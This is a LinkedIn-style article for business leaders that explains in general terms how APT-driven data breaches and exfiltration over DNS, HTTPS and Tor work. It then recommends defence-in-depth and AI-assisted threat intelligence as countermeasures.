Do you want to stop data breaches? Let’s first have a deeper understating of how a data breach could happen.
Businesses handle a vast amount of sensitive personal financial and business data, some of which are governed by laws and regulations in local and international jurisdictions. Organizations need to secure their digital infrastructure to comply with federal laws; reduce financial losses that result from data breaches and ensure a secure digital environment for business customers and partners to support competitiveness in the marketplace.
The financial consequences of a data breach are set on the rise, but the cost goes beyond potential fines. Data breaches could have a catastrophic impact not only in the loss of a company's reputation and stock price but also in economic terms. This amplifies the relentless challenge of staying ahead of security vulnerabilities to protect against the movement of sensitive data outside organisations’ secure perimeter.
Reports show that external hackers are the primary cause of data breaches; however, organizations implement defence mechanisms (such as DLP) that mainly focus on insider hackers and enterprise users to detect internal or accidental data breaches. External Data breaches are usually a result of Advanced Persistent Threats (APTs) that happen over a large period (i.e. many months), to enable hackers to remain anonymous and hidden to gain access to enterprise systems, compromise infrastructure and steal data.
How a data breach could happen
To be able to defend against data breaches, the first step is to understand how data breaches take place. A data breach, or what we technically call data exfiltration, is the process of transmitting confidential data outside the enterprise network boundaries. It is commonly achieved after hackers establish a foothold in an organization's internal network by using sophisticated techniques to remain hidden for long periods of time while actively hunting for valuable data. Hackers can use multiple pathways to steal data, but the one that is often unknowingly left open is using botnets and APTs. APTs are aggressive types of attacks that enable hackers to remain anonymous and hidden thereby allowing them to gain access to enterprise systems, compromise infrastructure and steal data.
APT attacks are usually highly targeted attacks with clear goals and targets are typically governments or enterprises possessing substantial intellectual property value or digital assets that bring competitive advantage or strategic benefits. The actors behind APTs are typically a group of skilled hackers, working in a coordinated way. They may work in a government/military cyber unit or be hired as cyber mercenaries by governments and enterprises. This provides them with the ability to work for a long period and have access to zero-day vulnerabilities and attack tools. When they are state-sponsored, they may even operate with the support of military or state intelligence (Chen et al., 2014b).
APT attacks are stealthy, possessing the ability to stay undetected, concealing themselves within enterprise network traffic, and interacting just enough to achieve the defined objectives. Hackers find their target data using various data collection and monitoring tools. Once found, the hackers then need to extract as much data from the enterprise network and slowly exfiltrate the data to avoid detection. To transmit data, hackers typically use backdoors or exploit a vulnerability in the operating system to establish a shell between the compromised host and the hackers’ servers using a predetermined protocol to facilitate exfiltration such as DNS or HTTPS. For example, DNS can be misused by hackers to facilitate command and control with a compromised host, move malicious code into a network and exfiltrate data. HTTPS can also be used to exfiltrate data to minimize the risk of detection, as its flexible structure provides a lot of benefits to hackers to facilitate command and control and enable undetected large data transfers.
The final step is exfiltrating stolen data to remote servers in encrypted traffic through anonymous networks (e.g. Tor and I2P networks). Anonymous networks consist of a network of relay servers that are run by volunteers all over the world. When a hacker connects to the Tor network, a path is created from the user to the destination server to which the hacker needs to connect. This path consists of three relay servers and all the communications through the Tor network are relayed through this pre-built path. All the data going through the Tor network is completely encrypted such that nobody who intercepts the communication has a clue as to who the sender is (Winter et al., 2014). This makes it challenging to identify the source of the attack.
On the other hand, with APTs, data leakage might not actually occur until several months after a target system has been compromised. The time hackers take to exfiltrate data depends on many factors such as attack strategy, data size, link speed and installed detection defences at the target network. For example, the Carbanak APT is an ultra-massive money-stealing campaign with total losses summing up to 1B to date; the campaign has been active since December 2013, with peak infections and compromised banking systems recorded in June 2014. Hackers may also use other attacks such as distributed denial of service (DDoS) as a means of distraction from the real thrust of data exfiltration. For example, hackers used DDOS against Carphone Warehouse websites to distract its IT team from a coordinated data breach of their customer database that resulted in the theft of 2.4 million customer details.
Detecting APTs is very challenging as it requires a deep analysis of system events that are spaced out over a large period (i.e., many months) in a distributed environment that originates from different networks, systems, and applications. In other words, preventing data breaches requires greater visibility into all layers of the digital infrastructure, digital asset activities and the threat landscape. Since APT actors use various stealthy and evasive state-of-the-art techniques, there is no known pattern that traditional security solutions could recognise, due to the massive amount of data that needs to be analysed.
Recommended by LinkedIn
Solution
To prevent data breaches and APT threats targeting to move data outside an organization's secure perimeters at the initial stages before data exfiltration can take place, organisations need to implement robust in-depth security controls at all levels including hardware, networks, operating systems, and applications, especially at the network level. Inspecting traffic headers only, is no longer sufficient and security teams need to set up complex policies and rules to examine the full content of data packets as they traverse a monitored network checkpoint. I understand that there are sensitivity and trade-off points between security and performance that could affect the performance and the architectural decisions of cybersecurity controls, and this takes us to another important point "risk appetite" which defines an organization's risk tolerance.
On the other hand, with the complexity of today's businesses and their digital infrastructure, enterprises also need to understand why and how a breach has happened with logical reasoning to enable effective security operations and risk management plans and automate security operations. Human intelligence is no longer able to provide reasonable reasoning and quick and thoroughly make decisions in such complex environments and security teams need a new way to become more agile and autonomous.
Intelligence-driven solutions, such as threat intelligence and data science, have been recently introduced to streamline incident response and prevent risks of such APT threats and data breaches. A key enabler to implement threat intelligence is data intelligence, or in other words, cyber data management. Data intelligence provides organizations with a better understanding of their business and threat data to automate and speed risk management and incident response, allowing the development of effective and measurable security controls. Data and threat intelligence can be achieved with the support of Artificial Intelligence (AI) and Machine Learning (ML) to achieve predictive powers by automating and enhancing the process of regression, analysis, classification, and prediction. However, ML and AI will never be a silver bullet in the cybersecurity industry to stop hackers, in comparison to fields such as image recognition or natural language processing (two areas where machine learning is prospering). Utilizing AI/ML to support implementing intelligence-driven security solutions has several requirements and challenges (I will try to discuss these challenges in another article).
In Conclusion, achieving a strong cyber security posture with a limited budget is a complex problem with interrelated components that work together at both the business and technology levels. It might be challenging for you as a business leader to deal with the above complexities and ensure better transparency, visibility and interpretation of cyber data and decisions, to improve productivity, efficiency, and effectiveness across your organization’s security posture. However, as a business leader, all you need is to realise the complexity of the problem and the need to talk to the right teams to help you uplift the cybersecurity of your organization.
Kind Regards,
Dr. Amani S. Ibrahim
Cyber Security Leader, MBA (Cyber)
2yGreat write up! Really appreciate you sharing your thoughts here for everyone to learn!